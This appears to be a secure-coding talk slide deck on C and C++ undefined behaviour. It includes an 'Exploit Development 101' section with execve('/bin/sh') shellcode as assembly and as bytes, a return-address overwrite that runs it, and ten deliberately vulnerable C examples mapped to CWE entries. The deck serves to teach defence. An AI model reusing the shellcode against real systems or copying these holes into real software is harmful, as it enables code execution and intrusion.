  • 43. 1. int main(void) { 2. __asm__( 3. "jmp push_stringnt" 4. "pop_string: pop %rdint" 5. "xor %rdx, %rdxnt" 6. "xor %rax, %raxnt" 7. "mov %rsp, %rsint" 8. "mov %rdx, 8(%rsp)nt" 9. "mov %rdi, (%rsp)nt" 10. "mov $0x3b, %alnt" 11. "syscallnt" 12. "push_string: call pop_stringnt" 13. ".string "/bin/sh"nt" 14. ); 15. } @pati_gallardo int execve( const char *filename, char *const argv[], char *const envp[]); %rax : syscall 59 %rdi : filename %rsi : argv[] %rdx : envp[] 43
  • 44. char shellcode[] = "xebx17" // jmp push_string "x5f" // pop_string: pop %rdi "x48x31xd2" // xor %rdx, %rdx "x48x31xc0" // xor %rax, %rax "x48x89xe6" // mov %rsp, %rsi "x48x89x54x24x08" // mov %rdx, 8(%rsp) "x48x89x3cx24" // mov %rdi,(%rsp) "xb0x3b" // mov $0x3b,%al "x0fx05" // syscall "xe8xe4xffxffxff" // callq pop_string "/bin/sh"; @pati_gallardo 44
  • 45. Write C code for shellcode Compile it Put bytes in a char buffer Put jmp addr on ret addr @pati_gallardo Write inline assembly, eliminating zero bytes 45
  • 46. int main(void) { intptr_t *ret; ret = (intptr_t *) &ret + 2; (*ret) = (intptr_t) shellcode; } The Exploit: How to run your shell code @pati_gallardo 46
  • 47. Wat? What Happened to our Stack Overflow? @pati_gallardo 47
  • 48. Write direction vs Stack growing direction 100 Return address 99 <something> 98 char array item 3 97 char array item 2 96 char array item 1 95 char array item 0 Stack grows toward lower addresses Writes go toward higher addresses ptr++ 48
  • 49. Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Writes go toward higher addresses ptr++ 49
  • 50. Write direction vs Stack growing direction 100 char[5]: “ret” address 95 99 char[4]: “ret” address 95 98 char[3]: Shellcode 97 char[2]: Shellcode 96 char[1]: No-op 95 char[0]: No-op Stack grows toward lower addresses Instruction addresses also go toward higher addresses 50
  • 51. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 53. 1. Unsigned Integer Wraparound 2. Signed Integer Overflow 3. Numeric Truncation 4. Stack Buffer Overflow 5. Heap Buffer Overflow 6. Buffer Underflow 7. Use After Free 8. Double Free 9. Incorrect Type Conversion 10. Uncontrolled Format String @pati_gallardo
  • 54. Code is on GitHub: https://github.com/patricia-gallardo/insecure-coding-examples @pati_gallardo 54
  • 55. 1) Unsigned Integer Wraparound 2) Signed Integer Overflow 3) Numeric Truncation Error @pati_gallardo 55
  • 56. 1) CWE-190: Unsigned Integer Wraparound int main(void) { unsigned int first_len = UINT_MAX; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- sum == 255 memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT30-C. Ensure that unsigned integer operations do not wrap @pati_gallardo 56
  • 57. 2) CWE-190: Signed Integer Overflow int main(void) { int first_len = INT_MAX; int second_len = 256; int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; if((first_len + second_len) <= 256) { // <- UB (negative) memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT32-C. Ensure that operations on signed integers do not result in @pati_gallardo 57
  • 58. 3) CWE-197: Numeric Truncation Error int main(void) { unsigned int first_len = UINT_MAX - 256; unsigned int second_len = 256; unsigned int buf_len = 256; char first[first_len], second[second_len], buf[buf_len]; int new_len = (first_len+second_len); // IDB (negative) if(new_len <= 256) { memcpy(buf, first, first_len); memcpy(buf + first_len, second, second_len); } } SEI-INT31-C. Ensure that integer conversions do not result in lost or misinterpreted data @pati_gallardo 58
  • 59. 4) Stack-based Buffer Overflow 5) Heap-based Buffer Overflow 6) Buffer Underwrite/Underflow @pati_gallardo 59
  • 60. 4) CWE-121: Stack-based Buffer Overflow int main(void) { char buffer[10]; // CWE-242: Inherently Dangerous Function gets(buffer); // <- Write outside } SEI-STR31-C. Guarantee that storage for str. has sufficient space for character data and the null terminator @pati_gallardo 60
  • 61. 5) CWE-122: Heap-based Buffer Overflow int main(int argc, char * argv[]) { char* buf = (char*)malloc(sizeof(char)*10); strcpy(buf, argv[1]); // <- Write outside free(buf); } SEI-ARR38-C. Guarantee that library functions do not form invalid pointers @pati_gallardo 61
  • 62. 6) CWE-124: Buffer Underwrite / Underflow int main(void) { char src[12]; strcpy(src, "Hello World"); size_t length = strlen(src); int index = (length -1); while (src[index] != ':') { src[index] = '0'; index--; } } SEI-ARR30-C. Do not form or use out-of-bounds pointers or array subscripts @pati_gallardo 62
  • 63. 7) Use After Free 8) Double Free @pati_gallardo 63
  • 64. 7) CWE-416: Use After Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] printf("%lun", strlen(buffer)); //Use after free } SEI-MEM30-C. Do not access freed memory @pati_gallardo 64
  • 65. 8) CWE-415: Double Free int main(void) { char* buffer = (char*)malloc (256); bool error = true; if (error) free(buffer); // [...] free(buffer); // second free } SEI-MEM51-CPP. Properly deallocate dynamically allocated resources @pati_gallardo 65
  • 66. 9) Incorrect Type Conversion/Cast 10) Use of External Format String @pati_gallardo 66
  • 67. 9) CWE-704: Incorrect Type Conversion/Cast struct A {}; struct B {}; int main(void) { struct A * a = (struct A *) malloc (sizeof (struct A)); struct B * b = (struct B *) a; // cast to unrelated type } SEI-EXP05-CPP. Do not use C-style casts @pati_gallardo 67
  • 68. 10) CWE-134: Use of External Format String int main(int argc, char * argv[]) { char * format = argv[1]; char * str = argv[2]; printf(format, str); } $ ./format_string "%s %d" "Hello World" Hello World 1745066888 SEI-FIO47-C. Use valid format strings @pati_gallardo 68
  • 69. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 71. Classes of Tools - Several compilers - Warnings / Errors - Instrumentation - Static Analysis - Automated Tests - Fuzzing - Continuous Integration - Libraries @pati_gallardo 71
  • 72. Undefined Behavior What specs exist? Compiler Optimizations Exploit Development 101 Exploitability Take your vitamins The Eight I'd Really Rather You Didn'ts @pati_gallardo
  • 73. The Eight I'd Really Rather You Didn'ts* *The Eight Condiments (Pastafarianism) @pati_gallardo 73
  • 74. Caution: Don’t take me too seriously. But seriously, think about it! *wink* @pati_gallardo 74
  • 75. The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 75
  • 76. 1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 76
  • 77. CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New @pati_gallardo 77
  • 78. 3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 78
  • 79. @pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input79
  • 80. 5. I'd Really Rather You Didn't: Use Pointers a Lot @pati_gallardo 80
  • 81. 6. I'd Really Rather You Didn't: Write “clever” code @pati_gallardo 81
  • 82. 7. I'd Really Rather You Didn't: Use shared_ptr a Lot @pati_gallardo 82
  • 83. 8. I'd Really Rather You Didn't: Share State a Lot @pati_gallardo 83
  • 84. T S P f . Patricia Aas, T S @pati_gallardo
  • 86. Expanding on Some of the points
  • 87. The Eight I'd Really Rather You Didn'ts 1. Use C 2. Allocate with new 3. Do math a lot 4. Trust your external input 5. Use pointers a lot 6. Write “clever” code 7. Use shared_ptr a lot 8. Share state a lot @pati_gallardo 87
  • 88. 1. I'd Really Rather You Didn't: Use CCG : CPL.1: Prefer C++ to C @pati_gallardo 88
  • 89. Std::string - Concatenate Strings int main() { std::string first = "Hello "; std::string second = "World"; std::string buffer = first + second; std::cout << buffer << "n"; } @pati_gallardo 89
  • 90. Std::cout/cin : Using the Command Line int main(int argc, char * argv[]) { std::string second; std::cin >> second; std::string first = argv[1]; std::string buffer = first + second; std::cout << buffer << "n"; } $ ./command_line "Hello " World Hello World @pati_gallardo 90
  • 91. Algorithms : Strip after Colon int main() { string str = "Hello:World"; auto colon = [](int ch) { return ch == ':'; }; auto first = find_if(rbegin(str), rend(str), colon); str.erase(first.base(), end(str)); } @pati_gallardo 91
  • 92. C++ Casts : Safe Downcasting class Spiderman {}; class Ironman {}; int main() { Spiderman * peter = new Spiderman; Ironman * tony = static_cast<Ironman*>(peter); } inheritance.cpp:6:20: error: static_cast from 'Spiderman *' to 'Ironman *', which are not related by inheritance, is not allowed Ironman * tony = static_cast<Ironman*>(peter); ^~~~~~~~~~~~~~~~~~~~~~~~~~~~ 1 error generated. @pati_gallardo 92
  • 93. CG : R: Resource management CG : R.11: Avoid calling new and delete explicitly 2. I'd Really Rather You Didn't: Allocate With New93 @pati_gallardo
  • 94. Allocating on the Stack #include "Hero.h" int main() { Hero h; } @pati_gallardo @pati_gallardo
  • 95. Where is it? Stack Hero stackHero; Heap unique_ptr<Hero> heapHero = make_unique<Hero>(); Hero * heapHero = new Hero(); @pati_gallardo @pati_gallardo
  • 96. Loving the Stack #include <iostream> #include <string> using namespace std; int main() { { string s("Hello World!"); cout << s; } // <- GC happens here! } @pati_gallardo @pati_gallardo
  • 97. Using the Stack To Manage Resource Lifetimes Destroyed when exiting scope Deterministic Garbage Collection @pati_gallardo
  • 98. Hold a Value on the Stack that Controls The Lifetime of Your Heap Allocated Object using namespace std; { unique_ptr<Hero> myHero = make_unique<Hero>(); shared_ptr<Hero> ourHero = make_shared<Hero>(); } Smart Pointers @pati_gallardo
  • 99. 3. I'd Really Rather You Didn't: Do Math A Lot @pati_gallardo 99
  • 100. Primitive types have no semantics, only limits Reduce the value space Keep it within defined behavior Enum class, string literals, user defined literals, size_t @pati_gallardo100
  • 101. Enum Class enum class Direction : char { NORTH = 'N', EAST = 'E', WEST = 'W', SOUTH = 'S' }; std::ostream& operator << (std::ostream& os, const Direction& obj) { os << static_cast<std::underlying_type<Direction>::type>(obj); return os; } int main() { std::cout << "t" << Direction::NORTH << "n" << "t" << Direction::EAST << "n" << "t" << Direction::WEST << "n" << "t" << Direction::SOUTH << "n"; } @pati_gallardo 101
  • 102. String Literals using namespace std::literals::string_literals; int main() { auto heroes = {"Spiderman"s, "Ironman"s, "Wonder Woman"s}; for(auto const & hero : heroes) { std::cout << "t" << hero << "n"; } } @pati_gallardo 102
  • 103. 1) User Defined Literals int main() { auto h = 24_hours; auto d = 7_days; auto err = h + d; } user_defined_literals.cpp:25:21: error: invalid operands to binary expression ('Hours' and 'Days') auto err = hours + days; ~~~~~ ^ ~~~~ 1 error generated. @pati_gallardo 103
  • 104. 2) User Defined Literals struct Hours { explicit Hours(unsigned long long n) : num(n) {} unsigned long long num = 0; }; struct Days { explicit Days(unsigned long long n) : num(n) {} unsigned long long num = 0; }; @pati_gallardo 104
  • 105. 3) User Defined Literals Hours operator "" _hours(unsigned long long num) { return Hours(num); } Days operator "" _days(unsigned long long num) { return Days(num); } @pati_gallardo 105
  • 106. Use Size_t for Sizes - Unsigned integer type - Result of the sizeof operator - Use for object sizes - Use for array indexing and loop counting @pati_gallardo 106
  • 107. @pati_gallardo 4. I'd Really Rather You Didn't: Trust Your External Input107
  • 108. Taint - Is the source of this value in your code? - Command line args, size fields in headers, exported functions, APIs @pati_gallardo 108
  • 109. So… what should I remember from this presentation? @pati_gallardo 109
  • 110. Well, I'd Really Rather You Didn't: Use C @pati_gallardo 110
  • 111. Learn some Modern C++ Instead! @pati_gallardo 111
  • 112. Bjarne Stroustrup “C makes it easy to shoot yourself in the foot; C++ makes it harder, but when you do it blows your whole leg off.” @pati_gallardo 112
  • 113. Bjarne Stroustrup “Within C++, there is a much smaller and cleaner language struggling to get out.” @pati_gallardo 113